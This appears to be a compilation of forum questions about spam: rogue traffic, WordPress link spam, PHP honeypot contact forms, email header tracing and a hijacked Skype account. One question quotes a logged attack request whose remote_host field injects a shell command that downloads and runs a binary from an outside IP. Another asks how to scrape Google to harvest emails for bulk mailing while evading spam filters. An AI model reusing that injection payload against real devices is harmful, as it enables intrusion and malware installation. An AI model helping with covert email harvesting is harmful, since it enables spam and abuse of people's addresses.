Spam from specific user agent

I’ve been getting thousands of requests each day from a specific user agent, Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:38.0) Gecko/20100101 Firefox/38.0. They’re all from different IP addresses (the ones I’ve looked up have been Google LLC and Cloudflare), and they all use that exact same user agent. So far I’ve seen 90 unique IP addresses.

I’ve started giving 403 statuses back to them, since it seems like something is wrong here, but I can’t trace them back to any one specific point. They all seem to be legitimate requests, but they’re just so suspicious with the amount of servers they’re coming from. Am I missing something here?

How to stop unknown spam keyword?

I have a weird problem. Kindly let me know whether I should be worried or not. I installed a redirect plugin in WordPress and saw a 404 error log. Since last night, one Korean bet website has been in the list, like mydomain.com/unknown Korean bet website, which resulted in a 404 error page. Then I searched for the string and found it in wp-minify (a WP optimizer option) that I had activated last night, so I deleted the wp-minify folder on my web host and also deactivated and deleted WPoptimise. After that, I can still see 4,5 links per minute in the 404 errors that are usually for spam links (like bet sites, etc.), but there is nothing on my website. It’s like non-existent links to my website with their keyword names. Even though there is nothing on my web host after removing the plugin, will this link spamming affect my Google score? Is there a way I can stop this?

Appreciate any help

Scraping Google “reasonably” without triggering spam filter

My goal is to do some scrapes to get list of businesses per city.

I need to send about 500 emails per day, I use the inurl:contact to make sure that the results have a contact page, and then I extract the email address from that.

So I figure I might do batches of about 2000 URLs, not sure yet…

Can I safely crawl 1000-5000 URL results a day with the default proxies that come with scrapebox (using the option “harvest proxies”)?

Spam filter for contact-form.php doesn’t work

I am trying in vain to include SPAM protection in the contact form … Can someone help me with this? It’s just getting worse with the spam messages! Google Recaptcha does not work … the checkout field is displayed, but no matter whether it is confirmed or not, the messages go out. Unfortunately, this is also the case with other plugins. In principle, a "simple" // "invisible" query would be enough for me. Most bots should fall for it … But I just don’t get it involved. I uploaded the original_code to github. Below is a file with "invisible" spam protection ….

https://gist.github.com/MrThiemann/3ce76269340acf52c6b5526e5bff0c3e

```php
<?php
/*
...........................................................
Template Name: Kontaktformular
*
*
* @file           contact-form.php
* @filesource     wp-content/themes/handwerk/contact-form.php
............................................................
*/
?>

<?php
// Load the theme options used by the contact form.
$data = get_option('bo_options');
$response = isset( $data['contact']['bo_contact_response'] ) ? $data['contact']['bo_contact_response'] : null;
$recipient = isset( $data['contact']['bo_formmail_address'] ) ? $data['contact']['bo_formmail_address'] : null;
$shdata = isset( $data['contact']['bo_show_dataprot'] ) ? $data['contact']['bo_show_dataprot'] : null;
$datalink = isset( $data['contact']['bo_dataprot_page_url'] ) ? $data['contact']['bo_dataprot_page_url'] : null;
$bloginfo = get_bloginfo('admin_email');
// Fall back to the site admin address when no recipient is configured.
if ($recipient == '') {
    $rec = $bloginfo;
} else {
    $rec = $recipient;
}
$sub = isset( $data['contact']['bo_formmail_subject'] ) ? $data['contact']['bo_formmail_subject'] : null;
$offerinfo = isset( $data['contact']['bo_offer_info_text'] ) ? $data['contact']['bo_offer_info_text'] : null;

// Defaults so the template below never reads an undefined variable.
$name = '';
$objectname = '';

if(isset($_POST['submitted'])) {
    // Honeypot: the off-screen "checking" field must be present and empty.
    // A request that omits the field was not produced by the rendered form.
    if(!isset($_POST['checking']) || trim($_POST['checking']) !== '') {
        $captchaError = true;
    } else {
        if(trim($_POST['contactName']) === '') {
            $nameError = __('Bitte tragen Sie Ihren Namen ein','bobox');
            $hasError = true;
        } else {
            $name = trim($_POST['contactName']);
        }
        $phone = trim($_POST['phone']);
        $subject = trim($_POST['subject']);
        if(isset($_POST['objectName'])) {
            $objectname = trim($_POST['objectName']);
        }
        if(trim($_POST['email']) === '') {
            $emailError = __('Sie haben vergessen, eine E-Mail Adresse einzutragen');
            $hasError = true;
        } else if (filter_var(trim($_POST['email']), FILTER_VALIDATE_EMAIL)) {
            // Validated address, safe to place in the Reply-To header below.
            $email = trim($_POST['email']);
        } else {
            $emailError = __('Sie haben eine ungültige E-Mail Adresse eingetragen');
            $hasError = true;
        }

        if(trim($_POST['comments']) === '') {
            $commentError = 'Sie haben vergessen, eine Nachricht einzutragen';
            $hasError = true;
        } else {
            if(function_exists('stripslashes')) {
                $comments = stripslashes(trim($_POST['comments']));
            } else {
                $comments = trim($_POST['comments']);
            }
        }
        // Send the mail only when every check above passed.
        if(!isset($hasError)) {
            $emailTo = $rec;
            $msubject = $sub;
            $body = " \n\nEine Anfrage zum Thema: $objectname  \nvon:\nName: $name \nEmail: $email \nBetrifft: $subject \nTelefon: $phone \n\nNachricht: $comments ";
            $headers = 'From: <'.$emailTo.'>' . "\r\n" . 'Reply-To: ' . $email . "\r\n";
            $headers .= "MIME-Version: 1.0\r\n";
            $headers .= "Content-type: text/plain; charset=utf-8\r\n";
            $headers .= "Content-Transfer-Encoding: 8bit";

            mail($emailTo, $msubject, $body, $headers);

            $emailSent = true;
        }
    }
}
?>

<?php get_header(); ?>

<div id="page-entry">

    <?php if(isset($hasError) || isset($captchaError)) { ?>
        <?php // Submitted values are escaped before being echoed back into the page. ?>
        <h1>Sorry, <?php echo esc_html($name); ?></h1>
        <p class="error">Bei der &Uuml;bermittlung hat es einen Fehler gegeben!</p>
    <?php } ?>

    <?php if(isset($emailSent) && $emailSent == true) { ?>

        <div class="thanks">
            <h2>Vielen Dank, <?php echo esc_html($name); ?></h2>
            <p><?php echo $response; ?></p>
        </div>

    <?php } else { ?>

        <?php if (have_posts()) : ?>

            <?php while (have_posts()) : the_post(); ?>

                <h1 class="post-title"><?php the_title(); ?></h1>

                <div class="contact-content">
                    <?php the_content(); ?>
                    <?php include ("google-map-iframe.php"); ?>
                </div><!-- eof contact content -->

                <div class="contactform">

                    <?php if(isset($_POST["object-title"])) { ?>
                        <div class="selected-offer">
                            <p><?php echo $offerinfo; ?> <a href="<?php echo esc_url($_POST["object-link"]); ?>"><?php echo esc_html($_POST["object-title"]); ?></a></p>
                        </div>
                    <?php } ?>

                    <form action="<?php the_permalink(); ?>" id="contactForm" method="post">

                        <div class="formcolumn">
                            <label for="contactName"><?php echo __('Ihr Name','bobox'); ?>*:</label>
                            <input required="required" type="text" name="contactName" id="contactName" value="<?php if(isset($_POST['contactName'])) echo esc_attr($_POST['contactName']); ?>" class="requiredField" />
                            <?php if(isset($nameError)) { if($nameError != '') { ?>
                                <span class="error"><?php echo $nameError; ?></span>
                            <?php } } ?>

                            <label for="subject"><?php echo __('Betrifft','bobox'); ?>:</label>
                            <input type="text" name="subject" id="subject" value="<?php if(isset($_POST['subject'])) echo esc_attr($_POST['subject']); ?>" class="email" />
                        </div>

                        <div class="formcolumn">
                            <label for="email"><?php echo __('Ihre E-Mail Adresse','bobox'); ?>*:</label>
                            <input required="required" type="text" name="email" id="email" value="<?php if(isset($_POST['email'])) echo esc_attr($_POST['email']); ?>" class="requiredField email" />
                            <?php if(isset($emailError)) { if($emailError != '') { ?>
                                <span class="error"><?php echo $emailError; ?></span>
                            <?php } } ?>

                            <label for="phone"><?php echo __('Ihre Telefonnummer','bobox'); ?>:</label>
                            <input type="text" name="phone" id="phone" value="<?php if(isset($_POST['phone'])) echo esc_attr($_POST['phone']); ?>" class="email" />
                        </div>
                        <div class="clear"></div>

                        <label for="commentsText"><?php echo __('Ihre Nachricht','bobox'); ?>*:</label>
                        <textarea required name="comments" id="commentsText" rows="10" cols="30" class="requiredField"><?php if(isset($_POST['comments'])) { echo esc_textarea(stripslashes($_POST['comments'])); } ?></textarea>
                        <?php if(isset($commentError)) { if($commentError != '') { ?>
                            <span class="error"><?php echo $commentError; ?></span>
                        <?php } } ?>

                        <?php if(isset($shdata) && $shdata == 'yes') { ?>
                            <div class="wr clearfix">
                                <input required="required" type="checkbox" name="contactData" id="contactData" value="true"<?php if(isset($_POST['contactData']) && $_POST['contactData'] == true) echo ' checked="checked"'; ?> /><label class="shortleft agreelabel" for="contactData"><?php echo sprintf( __( 'Ja, ich habe die <a target="_blank" href="%s">Datenschutzerkl&auml;rung</a> gelesen und bin damit einverstanden, dass meine Daten elektronisch erhoben und gespeichert werden. Meine Daten werden ausschlie&szlig;lich zweckgebunden zur Bearbeitung meiner Anfrage genutzt.', 'bobox' ), esc_url($datalink) ); ?>*</label>
                            </div>
                        <?php } ?>

                        <!-- Honeypot field, positioned off-screen; humans leave it empty -->
                        <div class="screenReader" style="left: -9999px; position: absolute; top: -9999px;"><label for="checking" class="screenReader">If you want to submit this form, do not enter anything in this field</label><input type="text" name="checking" id="checking" class="screenReader" value="<?php if(isset($_POST['checking'])) echo esc_attr($_POST['checking']); ?>" /></div>

                        <input type="hidden" name="objectName" id="objectName" value="<?php if(isset($_POST["object-title"])) { echo esc_attr($_POST["object-title"]); } ?>" class="readonly " />
                        <input type="hidden" name="submitted" id="submitted" value="true" />

                        <button type="submit"><?php echo __('Nachricht jetzt absenden','bobox'); ?></button>

                    </form>
                </div>

            <?php endwhile; ?>
        <?php endif; ?>
    <?php } ?>
    <div class="clear"></div>
</div>
</div><!-- eof content -->

<?php get_footer(); ?>
```

and here is "actually" a simple invisible checkbox.

```php
<?php
$errors = array();

// Check whether the form was submitted
if(isset($_POST['submit'])) {

    // Reset the spam check on every new submission
    $spamcheck = false;

    // Spam check: both hidden extra fields must come back untouched
    if(!empty($_POST["repeat_email"]) || isset($_POST["terms"])) {
        $errors[] = "Zusatzfelder wurden ausgefüllt, wir vermuten Spam und brechen hier ab.";
    } else {
        $spamcheck = true;
    }

    // Validate the input
    // Fixed: this was "$spamcheck = true", an assignment that always evaluated to true
    if($spamcheck == true) {

        if(empty($_POST['name'])) { // Name is empty
            $errors[] = "Bitte geben Sie Ihren Namen an";
        }

        if(empty($_POST['email'])){ // Email is empty
            $errors[] = "Bitte Emailadresse angeben";
        } elseif (filter_var($_POST['email'], FILTER_VALIDATE_EMAIL) == false) { // Check the email format (PHP 5.2 and later)
            $errors[] = "Bitte geben Sie ein gültige Emailadresse an";
        }

        if(empty($_POST['message'])){ // Message is empty
            $errors[] = "Bitte geben Sie Ihre Nachricht ein";
        }

        if(!isset($_POST["gender"])){ // Spam check box not ticked
            $errors[] = "Bitte bestätigen Sie den Spamcheck";
        }
    }

    if(isset($_POST['submit']) && empty($errors) && $spamcheck == true) {
        // Spam test passed, all required fields filled in correctly
        // Write to the database or send the email
        echo "Alles richtig gemacht";
    }

}
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<title>Tutorial: PHP Formular Spamschutz und Validierung – Spam Emails verhindern auch ohne Captcha</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<script src="http://codeorigin.jquery.com/jquery-1.10.2.min.js"></script>
<script type="text/javascript">
$(document).ready(function(){
    // Fixed: the injected honeypot had value="test", so the server-side
    // !empty($_POST["repeat_email"]) check rejected every JavaScript-enabled visitor.
    $('.terms').append('<input type="text" name="repeat_email" value="" />');
});
</script>

<style>
    /* Demo form styles */
    label { display:inline-block; width:100px; }
    input { padding:5px; width:300px; }
    input[type="checkbox"] { width:20px; margin-right:10px; }
    textarea { width:410px; }

    .terms { display:none; }
</style>

</head>

<body>

    <h2>Demo: PHP Formular Spamschutz und Spamabwehr ohne Captcha</h2>
    <p><a href="http://sevenx.de/blog/php-formular-spamschutz-und-validierung-spam-emails-verhindern-auch-ohne-captcha">Zum Blogartikel &raquo; sevenX.de</a></p>

    <noscript>Bitte aktivieren Sie Javascript zum Absenden des Formulars oder nutzen Sie eine der alternative Kontaktmöglichkeiten unter www.domain.de/kontakt.htm</noscript>

    <?php if(isset($_POST['submit']) && empty($errors) === false) {?>
      <div style="background:#FCC">
          <strong>Bitte überprüfen Sie Ihre Angaben!</strong><br />
          <?php echo '<ul><li>'.implode('</li><li>',$errors).'</li></ul>'; ?>
      </div>
    <?php } ?>

    <?php // Submitted values are HTML-escaped before being echoed back into the form. ?>
    <form id="phpform" method="post" action="formular-spamschutz.php">

        <p><label for="name">Name<span>*</span></label>
        <input type="text" name="name" value="<?=(isset($_POST['name'])) ? htmlspecialchars($_POST['name'], ENT_QUOTES) : ''?>"></p>

        <p><label for="email">Email<span>*</span></label>
        <input type="text" name="email" value="<?=(isset($_POST['email'])) ? htmlspecialchars($_POST['email'], ENT_QUOTES) : ''?>"></p>

        <p><label for="message">Nachricht<span>*</span></label><br />
        <textarea name="message" rows="8"><?=(isset($_POST['message'])) ? htmlspecialchars($_POST['message'], ENT_QUOTES) : ''?></textarea></p>

        <?php // Fixed: the checkbox is named "gender" but its state was read back from $_POST['human']. ?>
        <p><input type="checkbox" name="gender" <?=(isset($_POST['gender'])) ? "checked='checked'" : ''?>><span>*</span> Ich versende keinen Spam</p>

        <p><input type="submit" name="submit" value="Absenden"></p>

        <div class="terms">
        Folgende Felder bitte frei lassen!
        <input type="checkbox" name="terms">
        </div>

    </form>
    <p><a href="http://sevenx.de/" target="_blank">Made with love by sevenX.de - Rico Loschke</a></p>

</body>
</html>
```

Was this spam email routed through Ukraine government’s mail servers? [closed]

I have recently received a typical spam email, but seeing it’s from domain gov.ua, I have decided to examine its headers, knowing that the From field is not a clear indicator of the sender.

To my surprise, the email originating from a mail client in South Africa had been routed through mail.mk.npu.gov.ua before reaching mx.gmail.com, Google’s mail exchange servers.

  1. Am I correct in assessing this?
  2. mk.npu.gov.ua belongs to Ukraine’s national police, so why would spam be routed through servers belonging to Ukrainian police?

Here is the relevant header excerpt:

```
Received: from mail.mk.npu.gov.ua (mail.mk.npu.gov.ua. [212.1.64.157])
        by mx.google.com with ESMTPS id 127si3307596ljf.47.2020.09.03.22.16.27
        (version=TLS1_2 cipher=ECDHE-ECDSA-AES128-GCM-SHA256 bits=128/128);
        Thu, 03 Sep 2020 22:16:27 -0700 (PDT)
Received-SPF: pass (google.com: domain of ubnon01@mk.npu.gov.ua designates 212.1.64.157 as permitted sender) client-ip=212.1.64.157;
Authentication-Results: mx.google.com;
       spf=pass (google.com: domain of ubnon01@mk.npu.gov.ua designates 212.1.64.157 as permitted sender) smtp.mailfrom=ubnon01@mk.npu.gov.ua
Received: from localhost (localhost [127.0.0.1])
    by mail.mk.npu.gov.ua (Postfix) with ESMTP id A584F4EA7B6;
    Fri,  4 Sep 2020 05:53:44 +0300 (EEST)
Received: from mail.mk.npu.gov.ua ([127.0.0.1])
    by localhost (mail.mk.npu.gov.ua [127.0.0.1]) (amavisd-new, port 10032)
    with ESMTP id rGonvgTsqLKI; Fri,  4 Sep 2020 05:53:44 +0300 (EEST)
Received: from localhost (localhost [127.0.0.1])
    by mail.mk.npu.gov.ua (Postfix) with ESMTP id 8015750574B;
    Fri,  4 Sep 2020 05:35:58 +0300 (EEST)
X-Virus-Scanned: amavisd-new at mk.npu.gov.ua
Received: from mail.mk.npu.gov.ua ([127.0.0.1])
    by localhost (mail.mk.npu.gov.ua [127.0.0.1]) (amavisd-new, port 10026)
    with ESMTP id QwWi9Xuk_Cn7; Fri,  4 Sep 2020 05:35:58 +0300 (EEST)
Received: from [172.20.10.2] (unknown [105.12.7.241])
    by mail.mk.npu.gov.ua (Postfix) with ESMTPSA id 7106E4EA8D6;
    Fri,  4 Sep 2020 05:29:50 +0300 (EEST)
```
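Added example, not part of the original question: a small Python parser that reads the `Received` chain from the excerpt above oldest-first, finds the hop where the message entered from a public address, and checks the `with` protocol keyword (per RFC 3848, `ESMTPA`/`ESMTPSA` mean SMTP AUTH succeeded). The function names are this example's own; it assumes the `from ... by ... with ...` layout shown in these headers, and only lines written by servers you trust (the `by` hosts) can be relied on.

```python
import ipaddress
import re
from email import message_from_string

# The six Received headers from the excerpt above, one folded header per hop.
RAW = """\
Received: from mail.mk.npu.gov.ua (mail.mk.npu.gov.ua. [212.1.64.157])
        by mx.google.com with ESMTPS id 127si3307596ljf.47.2020.09.03.22.16.27
        (version=TLS1_2 cipher=ECDHE-ECDSA-AES128-GCM-SHA256 bits=128/128);
        Thu, 03 Sep 2020 22:16:27 -0700 (PDT)
Received: from localhost (localhost [127.0.0.1])
    by mail.mk.npu.gov.ua (Postfix) with ESMTP id A584F4EA7B6;
    Fri,  4 Sep 2020 05:53:44 +0300 (EEST)
Received: from mail.mk.npu.gov.ua ([127.0.0.1])
    by localhost (mail.mk.npu.gov.ua [127.0.0.1]) (amavisd-new, port 10032)
    with ESMTP id rGonvgTsqLKI; Fri,  4 Sep 2020 05:53:44 +0300 (EEST)
Received: from localhost (localhost [127.0.0.1])
    by mail.mk.npu.gov.ua (Postfix) with ESMTP id 8015750574B;
    Fri,  4 Sep 2020 05:35:58 +0300 (EEST)
Received: from mail.mk.npu.gov.ua ([127.0.0.1])
    by localhost (mail.mk.npu.gov.ua [127.0.0.1]) (amavisd-new, port 10026)
    with ESMTP id QwWi9Xuk_Cn7; Fri,  4 Sep 2020 05:35:58 +0300 (EEST)
Received: from [172.20.10.2] (unknown [105.12.7.241])
    by mail.mk.npu.gov.ua (Postfix) with ESMTPSA id 7106E4EA8D6;
    Fri,  4 Sep 2020 05:29:50 +0300 (EEST)
"""

# from <helo> ([<rdns> ][<peer ip>]) by <server> ... with <protocol>
HOP = re.compile(
    r"from\s+(?P<helo>\S+)\s+\((?:(?P<rdns>\S+)\s+)?\[(?P<ip>[^\]]+)\]\)"
    r"\s+by\s+(?P<by>\S+).*?\bwith\s+(?P<proto>\S+)")
AUTH_PROTOCOLS = {"ESMTPA", "ESMTPSA"}  # RFC 3848: client passed SMTP AUTH

def hops(raw):
    """Parsed hops, oldest first (each server prepends its header, so reverse)."""
    parsed = []
    for value in reversed(message_from_string(raw).get_all("Received", [])):
        m = HOP.search(" ".join(value.split()))  # unfold continuation lines
        if m:
            parsed.append(m.groupdict())
    return parsed

def entry_hop(raw):
    """Oldest hop whose peer address is public: where the mail came in."""
    for hop in hops(raw):
        if ipaddress.ip_address(hop["ip"]).is_global:
            return hop
    return None

def is_authenticated_submission(hop):
    """True when the receiving server logged a successful SMTP AUTH."""
    return hop["proto"] in AUTH_PROTOCOLS

def writers(raw):
    """Servers that wrote the headers; trust the chain only as far as these."""
    return {hop["by"] for hop in hops(raw)}

if __name__ == "__main__":
    for h in hops(RAW):
        print(f'{h["ip"]:>15} -> {h["by"]} ({h["proto"]})')
    first = entry_hop(RAW)
    print("entry:", first["ip"], "authenticated:", is_authenticated_submission(first))
```
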

My question is being marked as spam and I’m blocked on Meta

Today, I tried to post a question on Information Security Stack Exchange, and the question was apparently marked as "spam" (the error message was this looks like spam). The content of the question can be found here: VeraCrypt Paste. I’m thinking it might have been because of the URIs, but I tried to remove them all and it continued to mark the question as spam.

I then went to Infosec Meta Exchange, to try to see if I could get some help, but I’m blocked there. Like, weirdly blocked. All requests I make to the Security Meta domain while logged in give me an empty page and a 500 status code. It works fine if I log out. I truly don’t know what to do.

I’m 100% aware this post doesn’t belong here, but I’m apparently out of options – don’t know what else I can do – the help page doesn’t say anything about that -, so please don’t downvote this right away. I’m obviously ok with this question being deleted, I just need some help now.

Spam Mail Related to my Browsing

I was searching google to find a good printer to buy. To my horror, the next day I got a spam mail with theme "Print smarter at low price". Is this a coincidence or is my PC breached? What should I do? No alerts from Anti-Virus. Or can that webpage I opened install some malware? I didn’t click on anything there.

Spam issue regarding security on gmail app

I have been getting a ton of spam email, so I looked at one of them. I did not click anything, or download anything. However there was a spammy image with option to click on (as they always do).

Would this infect my device or the app (gmail app)? I am using an android phone. All I did was look at a spam email.

As checks, I ran Play Protect from the Play Store. In addition, I have run several malware detection apps: Malwarebytes, Bitdefender, etc. I have also looked at the installed apps and used safe mode just in case. Nothing has turned up; all of these steps show no infections.

My questions: a) is there any other check I should do? b) does just looking at an email cause an infection on the gmail app on android?

Constant POST request spam to /cgi-bin/ViewLog.asp endpoint

I’ve got a DigitalOcean server that I use for different temporary servers. Lately I’ve found that sometimes I get a constant spam of the following requests:

```
POST http://127.0.0.1/cgi-bin/ViewLog.asp

Headers:
    Host: 127.0.0.1
    Connection: keep-alive
    Accept-Encoding": gzip, deflate
    Accept: */*
    User-Agent: B4ckdoor-owned-you
    Content-Length: 176
    Content-Type: application/x-www-form-urlencoded

Body:
{
    " remote_submit_Flag": "1", // Space is not a typo
    "remote_syslog_Flag": "1",
    "RemoteSyslogSupported": "1",
    "LogFlag": "0",
    "remote_host": ";cd /tmp;wget http://152.44.44.68/d/xd.arm7;chmod 777 xd.arm7;./xd.arm7;rm -rf xd.arm"
}
```

Which does not really bother me since I run Node.js servers only. What bothers me is the repetition of the attack and the Host header (although I believe this one can be faked).

I used to run a DNS server that defaulted to Google DNS, which I left unattended for some time, and it gathered 1.5TB of traffic in one month. The named -v shows version 9.11.3-1ubuntu1.12-Ubuntu.

Is the server compromised?

My old Skype is sending Baidu spam

My old Skype account that I haven’t used in over 4 years is sending my friends Baidu spam links. I tried logging in but couldn’t remember the password. I checked my old email on haveibeenpwned, and found out it was in a data breach from 2017 for Yu-Gi-Oh Dueling Network. Is this Yu-Gi-Oh data breach still available online? Because I can’t remember my old email password either. I don’t know if that’s how the hacker accessed my Skype but I can’t think of another way. PS: that email was my main e-mail from ages 12-19, so I’m worried about this leak. I really don’t know what to do… Thanks